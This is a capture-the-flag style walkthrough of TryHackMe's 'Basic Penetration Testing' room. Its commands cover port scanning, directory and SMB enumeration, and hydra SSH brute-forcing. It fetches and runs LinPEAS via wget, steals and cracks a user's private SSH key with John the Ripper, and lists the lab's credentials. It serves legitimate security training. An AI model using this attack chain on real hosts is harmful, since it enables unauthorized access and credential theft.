TryHackMe Basic Penetration Testing — Full Walkthrough
Source: John Hammond’s full run of the TryHackMe Basic Penetration Testing room (originally released 2020). Find the session on his channel or search YouTube.
emptyarray.com — Educational only. This write-up documents a beginner-style test
against a vulnerable Linux host in TryHackMe’s isolated lab. Substitute your own target IP where
examples use 10.10.100.180.
The room walks through a compact, realistic flow: connect over VPN, scan services, enumerate web and SMB, gain a foothold over SSH, then escalate using standard open-source tooling. Every step below maps to what you can reproduce in the free room.
Tools used
| Tool | Purpose |
|---|---|
| OpenVPN | Connect to the TryHackMe private network |
| nmap | Port scanning and service detection |
| gobuster | Directory and file brute-forcing |
| enum4linux | SMB enumeration |
| hydra | Password brute-forcing (SSH) |
| LinPEAS | Automated Linux privilege-escalation checks |
| John the Ripper | Cracking SSH key passphrases |
| ssh | Remote access with password or private key |
Step-by-step walkthrough
Setup
- Create a free TryHackMe account and open the Basic Penetration Testing room.
- Deploy the target machine and note its IP (example:
10.10.100.180). - Connect to the TryHackMe VPN with your downloaded
.ovpnprofile.
openvpn --config tryhackme.ovpnInitial reconnaissance
Run a full nmap scan to discover open ports and services:
nmap -sC -sV -oN initial_scan.txt 10.10.100.180Typical findings for this room:
- Port 22 — SSH
- Port 80 — Apache
- Ports 139/445 — SMB
Web enumeration
Browse to http://10.10.100.180 — a basic Apache page.
Brute-force directories with gobuster (common wordlist first):
gobuster dir -u http://10.10.100.180 -w /usr/share/wordlists/dirb/common.txt -x php,txtA deeper pass with the medium list:
gobuster dir -u http://10.10.100.180 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
This surfaces /development with two text files — dev.txt and
j.txt — worth reading for hints.
SMB enumeration
Enumerate SMB with enum4linux:
enum4linux -a 10.10.100.180Expect usernames such as jan and k, plus supporting detail for the next steps.
Credential harvesting & initial access
Read the files under /development for password-policy and context clues, then brute-force
SSH for user jan with hydra and rockyou:
hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.100.180Successful login in the walkthrough: jan / Armando.
Post-exploitation & privilege escalation
SSH in as jan:
ssh jan@10.10.100.180
Explore the filesystem; look for references to user k and Tomcat. Pull LinPEAS for a
structured privesc sweep:
wget -O linpeas.sh https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
chmod +x linpeas.sh && ./linpeas.shLinPEAS calls out a private SSH key at /home/k/.ssh/id_rsa.
Copy the key to your attacking machine, then prepare a hash for John:
ssh2john id_rsa > key.hash
john key.hash --wordlist=/usr/share/wordlists/rockyou.txtPassphrase from the walkthrough: beeswax.
Final access
SSH as k with the private key:
ssh -i id_rsa k@10.10.100.180Enter the passphrase when prompted, then read the remaining task files to finish the room.
Key lessons
- Enumeration dominates — hidden paths, SMB, and stray text files usually carry the next clue.
- Weak passwords and unprotected private keys show up constantly on misconfigured lab boxes.
- LinPEAS and enum4linux compress hours of manual triage.
- Test multiple services (web, SMB, SSH); the chain is rarely linear or obvious.
Ethical note
These techniques belong in authorized contexts only — such as this TryHackMe room. Do not run them against systems you do not have explicit permission to test.
The room is a clean end-to-end slice of basic pentesting and remains a strong first hands-on path. You can follow the same flow in the free lab: tryhackme.com/room/basicpentesting.